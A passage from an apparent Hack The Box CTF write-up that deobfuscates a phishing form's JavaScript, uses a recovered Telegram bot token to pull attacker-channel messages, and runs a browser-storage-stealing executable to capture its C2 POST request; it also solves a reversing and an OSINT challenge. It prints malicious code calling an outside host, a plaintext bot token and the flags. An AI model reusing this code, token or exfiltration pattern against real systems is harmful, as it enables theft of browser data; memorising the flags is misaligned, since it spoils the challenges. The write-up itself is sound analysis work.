}, CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](
btoa(
unescape(
'Ûíl±¡Gò³¯L-²7)ÏT¼'
)
)
), {
iv: CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](
btoa(
unescape(
'äu&ÊJ7/8\tüÆ\r\t0'
)
)
)
}).toString(CryptoJS[_$_9b39[4]][_$_9b39[5]])
);
As it is also heavily obfuscated, I pasted it into the Browser’s console after replacing the eval() function by console.log() :
We continue with the same process, deobfuscating the script piece-by-piece, when eventually we find this function:
function f(email_username, description_to_int) {
const channel_id = -1002496072246;
var enc_token = "nZiIjaXAVuzO4aBCf5eQ5ifQI7rUBI3qy/5t0Djf0pG+tCL3Y2bKBCFIf3TZ0Q==";
if (email_username === G("s3cur3k3y") && CryptoJS.SHA256(sequence.join("")).toString(CryptoJS.enc.Base64) === "18m0oThLAr5NfLP4hTycCGf0BIu0dG+P/1xvnW6O29g=" {
var decrypted = CryptoJS.RC4Drop.decrypt(enc_token, CryptoJS.enc.Utf8.parse(email_username), {
drop: 192
}).toString(CryptoJS.enc.Utf8);
var HOST = "https://api.telegram.org/bot" + decrypted;
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
const resp = JSON.parse(xhr.responseText);
try {
const link = resp.result.text;
window.location.replace(link);
} catch (error) {
alert("Form submitted!");
}
}
};
xhr.open("GET", HOST + "/forwardMessage?chat_id=" + description_to_int + "&from_chat_id=" + channel_id + "&message_id=5");
xhr.send(null);
} else {
alert("Form submitted!");
}
}
We understand here that the form, if filled with a specific email, description and checboxes combinaison, sends a telegram message to the user.
Now we paste the ’encrypted’ variable in the browser’s console to reveal its ouput:
We know have the Telegram Bot token and can start interacting with it. To test our theory, we use the basic ‘getMe’ api call:
import requests
API_TOKEN = "7767830636:AAF5Fej3DZ44ZZQbMrkn8gf7dQdYb3eNxbc"
HOST = "https://api.telegram.org/bot" + API_TOKEN
response = requests.get(f"{HOST}/getMe",)
print(response.text)
Response:
{
"ok": true,
"result": {
"id": 7767830636,
"is_bot": true,
"first_name": "OperationEldoriaBot",
"username": "OperationEldoriaBot",
"can_join_groups": true,
"can_read_all_group_messages": false,
"supports_inline_queries": false,
"can_connect_to_business": false,
"has_main_web_app": false
}
}
We’re on the right track! Now we will try to forward ourselves the messages the bot would’ve send. First, now that we have the bot’s name, we can add it to a new chat with us:
Afterwards, I tried to check if we were able to retrieve past messages using the ‘getUpdates’ API call, but it returned an error stating a webhook was set up:
I clicked on the link and was taken to a webpage were I could see all the requests made, including mine. This allowed me to get the ID of my chat with the bot:
Armed with this knowledge, I had everything needed to start transferring some messages.
import requests
API_TOKEN = "7767830636:AAF5Fej3DZ44ZZQbMrkn8gf7dQdYb3eNxbc"
HOST = "https://api.telegram.org/bot" + API_TOKEN
ATTACKER_CHANNEL_ID = -1002496072246
OUR_CHAT_ID = -4783059922
response = requests.get(
HOST +
"/forwardMessage?chat_id=" +
OUR_CHAT_ID +
"&from_chat_id=" +
ATTACKER_CHANNEL_ID +
"&message_id=5"
)
print(response.text)
Here is the API response telling us that the message was successfuly transfered:
{
"ok": true,
"result": {
"message_id": 9135,
"from": {
"id": 7767830636,
"is_bot": true,
"first_name": "OperationEldoriaBot",
"username": "OperationEldoriaBot"
},
"chat": {
"id": -4783059922,
"title": "HTB : OperationEldoriaBot",
"type": "group",
"all_members_are_administrators": true
},
"date": 1742937528,
"forward_origin": {
"type": "channel",
"chat": {
"id": -1002496072246,
"title": "Operation Eldoria",
"type": "channel"
},
"message_id": 5,
"date": 1735897128
},
"forward_from_chat": {
"id": -1002496072246,
"title": "Operation Eldoria",
"type": "channel"
},
"forward_from_message_id": 5,
"forward_date": 1735897128,
"text": "https://t.me/+_eYUKZwn-p45OGNk",
"entities": [
{
"offset": 0,
"length": 30,
"type": "url"
}
],
"link_preview_options": {
"is_disabled": true
}
}
}
And the message appeared in the chat:
Success! Or so I thought, because the link was expired
We saw that in the script, the Telegram Bot transfered a message with the ID 5. We thus tried to send ourselves some more messages with incremental IDs from 2 to 11. Here is the complete Telegram conv:
We download the zip file, extract its content using the password provided in the convo and run a ‘file’ on the Brave.exe file:
Running ‘strings’ on it, we learn from the output function names that it’s a C# executable, so we cannot use dnSpy to perform static analysis
Here is the plan:
- create a Win 10 VM
- install Wireshark
- install the Brave Browser
- run the Brave.exe malware
- Pray!
Ready to capture the malware traffic:
Upon executing the malware, we notice that it is trying to reach the zOlsc2S65u.htb domain:
We modify our hosts file to redirect the domain to our docker instance…
… and capture the traffic again. Here we see that the malware attempts to connect to the domain on port 31337/TCP:
I then had the idea to modify the hosts file again to redirect the domain to my machine IP address. I then used netcat to listen on the 31337/TCP port:
BINGO ! We got an HTTP GET request ! Meanwhile, in the Wireshark capture, I saw that the malware tried to send other requests but wasn’t able to do saw because netcat closed the connection as soon as it served the first HTTP GET request.
I changed my netcat command to use the ‘-k’ flag and got a POST request with JSON data:
POST / HTTP/1.1
Accept: */*
Content-Type: application/json
Authorization: Bearer Token eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcm9tIjoiY29zdGkiLCJjYW1wYWlnbl9pZCI6Ik9wZXJhdGlvbiBFbGRvcmlhIDogRXhwb3NpbmcgdGhlIGJyYXZlcyIsImF1dGgiOiJVMFpTUTJVd1JsRldSamxxVFVjMWVtTkVSbmxPUjAxNFRUTk9abGxxVG05TlZ6VnJXREpKZW1KcVJtNWliRGx6VFVSQ2NrMVhOVzVZTTAxNFpFUk9lbVpSUFQwPSJ9.HelK5pTs6fenv8TKmAPrV3tzhSZm4GEAnEV9vBBtAzg
Content-Length: 3303
User-Agent: Mozilla/5.0 (compatible;MSIE 7.0;Windows;Windows NT 6.3;Win64;x64 Trident/4.0)
Host: zOlsc2S65u.htb:31337
Connection: Close
Cache-Control: no-cache
{"n":0,"fid":"0","d":"g6pzLNtJryGSuL4mFZt4hjBkUl2ukYm9tSmYlz4tOcNpIy\u002BcMcHk2lQpf5ah8XrAClGlAe7Jn8BMt1pGCmw9Pm7IrjgI3OJstOILZPDslop6D\u002BXbq\u002BHRe1B8N9fxjp5YXKzaJTHMfmNQs5PTDRsEkX23U7S4LqaZMF6UKTXv8QpEr2lzQ5VTuEHoH/5KGV/5rrxNaMKR7XLdjJeDukyDTAIZKb4AWN9CVfdp5sBu9pWxGVXRqvFrVoP7QVMLT\u002B7EmxX8I/GT00UUagAl3BcKa\u002B1fwirpPkh34o6WCTHEi\u002BgDD2jaVfX2\u002BksWvuYXxi7Kng8lpd82Gboz4bFc8eEprayMi2T/WJyybzblWTMOdaUolPgMgVHvJAnubSaNOeKq4VhOtA1V6YBV68EMICwZhCwpVAEaS4g2gDEfKxeQHM4V37Eyf0nenChQ75t7OhAxaFgkDnewhHnPjvb\u002BnctcmrLspKy7Ok2PMm2iEoXqUHySR5Wbfw3DMWIbjflDwT6bqKdYfesBASP22nudUntrwJepOBkGsfGh3XWGfyh9JZrHfszT3Ja3Cu8QoUZfrAMykv/4flOBIH26dbrM/8uNMU0Ot0ggWdDCScPdOeD/GM1CeOOaee8cutVttaTwqCwK1KoZ/f\u002BdEUrI8ZK2Ftki/eKVSuP9UTOhtFl0e/KboiO\u002BGCk9NOJ7rEjabGGvH2z71kYp2qXUoIEVnzz9D4jlnO/8GHdnbxMXeO35f86fPoa8uirFqkR5kXVnvHiTrAss53uZ9WjGY0iuscwtLen/wndjKK11vghujJZLCv2Oo\u002BpMbi83/yixrL\u002B9ktwjrpcaVVQ5yIJ6ZB3UkA\u002BAfx4y\u002BN1MkU7tXcrBgTYBhwVxJhc4VT8jcmSTsJTWeFtFpGKNU9knLvRwwPCMwiYtxS0X26Ht1UHIsRulQo/Anc0gkjxknaaYH/TFGeC4L8LCfho8LkqahI9fJi5r7lgZGGWjlZqUI3NfLSqWQ1l8fe9tiS4eXTnL8iXVetdgHNX3j4PwMFbaGI2OiEkPWp2xPlN0VGOcViWOBbUT1FM8BzQSS86fKyb03aXTxNO2psoZ6mEMscmAgUKjlZqIc8oAxsEWiWIo9X5BGj7h\u002ByHZEryuMIX\u002BkocR5Ytdt5VRB6isFgihrh8iVZPzUOkIlTp91E\u002BbG91y8S89QUi\u002B5YaBMm2hCGxZHx4lUAH30epOFwZESAwUszhO0aqGHpaBh1S7dqy/4OQqVQPqU/rv87aAtycxPD\u002Bp0Jw3QBIomvPhsbGLs898Zg9IGUKA0KG9yLp\u002B4kutkWr1qxgKTCM\u002B9rWA6CZAMpGLUhC0p1HFE74cPke/VaA9mu9FvaqpKxXghQsLYDzaFuSfcFG7rYVln4/zSaf1x9snQpfXFne4Mtg3CJSjAp0I23zXHSm4bB1zgZcafFhO5D4KgoBSZsJb1ogCBkgWbzGks05B81XOuDxRVMr9HOlL2gqgCBiCPk5D/1hpQdIkGZr/bk3fLaq6jbPk0WxfXyxwcPWdddyRT76XEI0\u002BMKY6fMjAjWuGdCRDjbYudHNJbYhS71DJpDRy4kxtwW5NPGD01XzO\u002Bb8llkHZ6j8W37OktKtfHrQh0oVwgEYyiDdCO6Umc0bnaLmtrQN7oFzogwVNwbc/DNQZDAtYNELM7zkKG4P0BdClJ4RgitKScOPi0\u002Bph\u002BRdHLai2ud5gC6XddZSptgryskYJ5bkQLFRx3pb4jRpi2w4iM2vnjpSgdDuZBdLdcHa2zfJFxL13qMNQXQjISALnlP9QdJcI31HhxkDtLMeIfvucXdd8SHKO0Gh2DXwAo3ADWGsrC/93PA\u002BJjU9adOjOQ8UioasFZJIKun76Xr9ASfnMUK2T2ijF9MaTvIqaMIwiImZnTPZxI7S0tBL/o9NRKl23MroTuR2DAVBUhgboGL6taMIJIz1fSEFdvbvNhhyqvq58tHD4VR10/WAkUX9Wiuh4nl\u002BS7ZwFAlW\u002B6DBuIPmeuh6a4qYwu5Drj\u002Bof/Eg1r9O51JFr9MSEn\u002BIIwICKP3iUoGAHPU3M5WlyxJ3pf04usZwYnKSMsbIcfUyogeny0BiM79DK0LHrmw4vph6OXqQZJUnUyRZb0hVrBmxkMOliw1EaMW2AoONpHXiWUo24EWQhhEIY00oH2D5o6qb5DeYwFhfvNGU8L2//UXeuJkW59uvEDzSPPVfsNtqFtwFMq41XSvBEY4QPAWcRHjO7fANVxrzFY0yIwmidCesbzIeL9RPmfP9xu7ph8S\u002BXBWM/Dx8DXwFD9l66BQHfAQN31HhlyQdgxcZzVMAdghXtFNW4DhGa7QMJz6ivgSyy7rd7BwG/JGgrXpLcJf35qIwdh/wxCOzNS97OlpTC4NGA8q\u002BwcIxprqL\u002BCnqSY0iv\u002BylYA0PS7\u002BVi77xwZXiStmoGH51VnFFzIHwK4EDxpquqOZQJo2rJPEIzleQfn36trXmtCXAcxOXfy4B4MZxDNvTGJMOUTSvc/S9DdDSsJa9KvBCRl\u002BBiGcS84VMyDziAg91\u002BYETBs2SuQ4fOomnfxtLhhBQ8qFJ/MzJ9Dw4/SOXAwChme2z\u002B3Wydpa68kznXINjBhlwslTHntiy3UGOnGR4CJyRadx\u002ByClUm\u002BWEsH\u002BRbOKiR3qzdfGdu6y2n2bIA1J2sabQVVB\u002BDvprbwd/cl8eFUH8QDEkAlfjqiZkAkDek6zrScEtPYLUBgjcoqS7d0X90F6IM4\u002Bm8jIQv0d0n9joubXrK7N5RLnS8FwZl\u002BlhtGYOpvqKrTWj\u002B76h1Zdh0FdoObg/rCfsYxzz6oaY8EQExUnrDFTlOPdYkzg57qMjtFcTUMwaGl0hGo37dh0LP2jTiW2GQqGojHO3MJbYqcnr012ydUjB1Ue4XBtlXgBktpBow9YcOIFjcf/VVmN7MP8d1iBPFLqA9McOxtHudCMOop8JDVe\u002BLH9R\u002BLYsdG9tG70DumB2bsadwDbRttIqSBaAAvGDKmxWZO2apCJ9qitAcFg8P6vzRQwrcCaok6kybGOwJL9N5LEo5K3YHJLHBEctsllNVyOA="}
As I new I was on a fresh install of the Brave Browser and the malware’s sole purpose was to exfiltrate its local storage, my attention immediately turned to the JWT token in the ‘Authorization’ HTTP header.
I used CyberChef to analyze it and noticed the ‘auth’ key, encoded in Base64:
Finally, we can obtain the flag by decoding from Base64 two times in a row:
Reversing ⚙️
EncryptedScroll
Question: Elowen Moonsong, an Elven mage of great wisdom, has discovered an ancient scroll rumored to contain the location of The Dragon’s Heart. However, the scroll is enchanted with an old magical cipher, preventing Elowen from reading it.
Flag: HTB{s1mpl3_fl4g_4r1thm3t1c}
For this challenge, we are given an executable. First and foremost, we run “file” on it:
Next, as I saw it wasn’t stripped, I ran “strings” to try to catch juicy detaills. And here we see some interesting function names:
At this stage, I opened the executable in Ghidra to have a look at those functions. The one that was of interest for us was this one:
We implement this function in python3…
def decrypt_message():
i = 0
local_38 = bytearray(b'\x49\x55\x43\x7c\x74\x32\x6e\x71') # little endian bytes from 0x716e32747c435549
local_30 = bytearray(b'\x6d\x34\x60\x67') # little endian bytes from 0x6760346d
uStack44 = bytearray(b'\x6d\x35\x68\x60') # little endian bytes from 0x6068356d
uStack40 = bytearray(b'\x35\x73\x32\x75') # little endian bytes from 0x75327335
local_24 = bytearray(b'\x69\x6e\x34\x75\x32\x64\x7e') # little endian bytes from 0x7e643275346e69
combined_bytes = local_38 + local_30 + uStack44 + uStack40 + local_24
while i < len(combined_bytes) and combined_bytes[i] != 0:
combined_bytes[i] = combined_bytes[i] - 1
i += 1
decrypted_string = combined_bytes.decode('ascii')
print(decrypted_string)
decrypt_message()
… and get the flag !
Finally, we make sure that it is the right flag by running the executable
OSINT 🧭
The Stone That Whispers
Question: In the twilight archives of Eldoria, Nyla studies an image of a mysterious monument. Her enchanted crystals glow as she traces ancient maps with rune-covered fingers. The stone atop the hill of kings calls to her, its secrets hidden in scattered records across realms. As her magical threads of knowledge connect, the true name emerges in glowing script: “The Stone of Destiny.” Another mystery solved by the realm’s most skilled information seeker, who knows that every artifact leaves traces for those who can read the signs.
**HTB{Name_Object}
Example: HTB{Pia_Pail} No special characters**
Flag: HTB{Lia_Fail}
Here is the picture of what we had to find:
Using reverse image lookup on google, we quickly find very similar pictures:
Finally, on the Wikipedia page, we learn the name of the stone:
